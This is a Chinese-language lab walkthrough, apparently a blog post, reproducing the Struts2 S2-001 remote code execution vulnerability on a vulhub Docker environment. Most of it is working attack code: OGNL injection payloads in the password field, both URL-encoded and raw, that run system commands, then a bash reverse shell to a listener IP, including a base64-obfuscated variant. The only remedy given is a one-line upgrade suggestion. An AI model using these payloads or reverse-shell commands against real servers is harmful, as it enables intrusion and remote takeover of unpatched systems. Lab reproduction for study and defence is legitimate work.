S2-001 远程代码执行漏洞
2023-02-18 16:38:48 时间
环境搭建
1.1 环境概述
- Linux操作系统
1.2 搭建过程
拉取镜像
cd vulhub/struts2/s2-001
docker-compose up -d
访问http://192.168.146.158:8101/login.action
2 漏洞复现
构造一个恶意的payload并发送。
username=admin&password=%25%7B%28%23cmd%3D%27echo%20has%20vul%27%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23a%3D%28new%20java.lang.ProcessBuilder%28%23cmds%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%29%7D
payload原型:
username=admin&password=%{(#cmd='echo has vul').(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#a=(new java.lang.ProcessBuilder(#cmds)).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close())}
发现成功执行了echo has vul
,说明存在该漏洞。
既然发现漏洞了,那我们可以开始反弹shell
bash -i >& /dev/tcp/192.168.146.158/9999 0>&1
base加密
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
访问漏洞url并且添加恶意payload进行抓包。
username=admin&password=%25%7B%28%23cmd%3D%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.146.158%2F9999%200%3E%261%27%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23a%3D%28new%20java.lang.ProcessBuilder%28%23cmds%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%29%7D
payload原型:
username=admin&password=%{(#cmd='bash -i >& /dev/tcp/192.168.146.158/9999 0>&1').(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#a=(new java.lang.ProcessBuilder(#cmds)).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close())}
攻击机进行监听,然后发现成功反弹了shell。
3 修复建议
1、推荐的解决方案:升级至比受漏洞影响的更高版本。
相关文章
- TypeScript,我从不喜欢到沉迷
- 有镜头的松下GH3+浑身是小毛病的SONY RX0M2
- DJI A3 飞控装机起飞篇
- 好摄之友-000
- 平平无奇的科普文-眼科学
- Sliverwave有刷四旋翼固件分析.二(原理图)
- Sliverwave四旋翼固件分析.三(蜂鸣器驱动)
- Sliverwave四旋翼固件分析.四(角度PID)
- 眼动追踪:梯度法精确定位眼中心(论文)
- 眼动追踪传感器选型
- 反思我在管理中犯过的重大错误
- 【Java系列】IDEA一键部署SpringBoot应用
- 【抓包工具】proxyman
- PDF编辑软件|Adobe Acrobat DC安装教程(图文),附安装包下载
- 效率工具丨Adobe Acrobat Pro DC 2020 (PDF阅读器)pdf编辑器全版本下载
- Acrobat 9 PDF编辑器全版本下载
- Acrobat 8 pdf编辑器全版本下载
- 基于RISC-V MCU CH32V307水感控制系统
- ABBYY FineReader PDF2023新版本下载有哪些功能?
- CleanMyMac X4.12.2版本要不要更新下载?